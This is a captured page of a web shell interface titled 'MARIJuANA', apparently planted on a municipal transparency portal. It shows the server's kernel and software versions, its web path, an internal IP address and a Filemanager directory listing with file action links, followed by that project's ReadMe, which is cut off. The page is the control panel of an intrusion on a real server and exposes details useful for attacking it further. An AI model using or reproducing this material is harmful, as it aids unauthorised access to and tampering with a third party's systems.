MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/guajeru/transparencia/assets/filemanager/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
connectors dir drwxr-xr-x 2021-07-19 12:00 R D
images dir drwxr-xr-x 2021-07-19 11:59 R D
scripts dir drwxr-xr-x 2021-07-19 12:00 R D
styles dir drwxr-xr-x 2021-07-19 11:53 R D
themes dir drwxr-xr-x 2021-07-19 12:09 R D
userfiles dir drwxr-xr-x 2021-07-19 11:59 R D
utils dir drwxr-xr-x 2021-07-19 11:53 R D
ReadMe.md 19.344 KB -rw-r--r-- 2021-07-19 11:50 R E G D
bower.json 0.32 KB -rw-r--r-- 2021-07-19 11:50 R E G D
changelog 2.67 KB -rw-r--r-- 2021-07-19 11:50 R E G D
composer.json 0.424 KB -rw-r--r-- 2021-07-19 11:50 R E G D
index.html 3.441 KB -rw-r--r-- 2021-07-19 11:50 R E G D
REQUEST EXIT
Filemanager ======================== FM is an open-source file manager released under MIT license. It is an alternative to elfinder or CKFinder. Support ------- Filemanager is under free license. If you want to support the filemanager development or just thank its main maintainer by paying a beer, you can make a donation by clicking the following button : [![Donate](https://www.paypal.com/en_US/i/btn/x-click-but21.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=2M5GWH9NLNEZL) Main features ------------- * A Filemanager relying on jquery. * Available in more than 20 languages. * [Highly customizable](https://github.com/simogeo/Filemanager/wiki/Filemanager-configuration-file) * Can work as standalone application * Easy integration with RTE like CKEditor, TinyMCE and so on. * Easy integration with [colorbox jquery plugin](https://github.com/simogeo/Filemanager/wiki/How-to-use-the-filemanager-with-colorbox-%3F) or [HTML simple textfield](https://github.com/simogeo/Filemanager/wiki/How-to-use-the-filemanager-from-a-simple-textfield-%3F) * Several computer language connectors available. **PHP is up-to-date** * Ability to upload, delete, modify, download and move files * Ability to create folders * Support user permissions - based on session * Handle system permissions * Multiple uploads support - based on [dropzonejs](http://www.dropzonejs.com) * Online text / code edition - based on [codeMirror](http://codemirror.net/) * Online documents viewer - based on [viewerJS](http://viewerjs.org/) * [Opening a given folder](https://github.com/simogeo/Filemanager/wiki/How-to-open-a-given-folder-different-from-root-folder-when-opening-the-filemanager%3F) * [Opening exclusively a given folder](https://github.com/simogeo/Filemanager/wiki/How-to-open-%28exclusively%29-a-given-subfolder-%3F) * [Passing parameters to the FM](https://github.com/simogeo/Filemanager/wiki/Passing-parameters-to-the-FM) * [File types restriction](https://github.com/simogeo/Filemanager/wiki/Set-up-upload-restriction-on-file-type) * Video and audio player relying on web browser capabilities * Textbox Search filter * Thumbnails generation * Image auto-resize * File size limit * File exclusion based on name and patterns * Images files only * Prevent files overwriting (or not) * Switch from list to grid view and vice-versa * Copy direct file URL * [CSS Themes](https://github.com/simogeo/Filemanager/wiki/Create-your-own-theme) - **Please, share your themes with others !** * and more ... Screenshot ------------- ![Filemanager Screenshot](http://i57.tinypic.com/35cqw74.png) Documentation ------------- Filemanager is highly documented on the [wiki pages](https://github.com/simogeo/Filemanager/wiki). API, see below. Installation and Setup ---------------------- **Preamble** Since many changes have been done recently, only PHP and MVC connectors are now available. You can try the latest version for others connectors, but with no warranty they implement all features and work correctly. To use other connectors, please download v0.8 version from https://github.com/simogeo/Filemanager/archive/v0.8.zip (PHP, ASHX, ASP, CFM, lasso, PL and JSP connectors are available) A JSP/Java connector implementation is available at : https://github.com/th-schwarz/C5Connector.Java --- **(1)** Check out a copy of the FileManager from the repository using Git : git clone http://github.com/simogeo/Filemanager.git or download the archive from Github : https://github.com/simogeo/Filemanager/archive/master.zip You can place the FileManager anywhere within your web serving root directory. **(2)** Make a copy of the default configuration file ("filemanager.config.js.default" located in the scripts directory), removing the '.default' from the end of the filename, and edit the options according to the following wiki page : https://github.com/simogeo/Filemanager/wiki/Filemanager-configuration-file Having a look on configuration cases study may also be helpful to you : https://github.com/simogeo/Filemanager/wiki/Specify-user-folder%2C-configuration-cases **(3a)** If you are in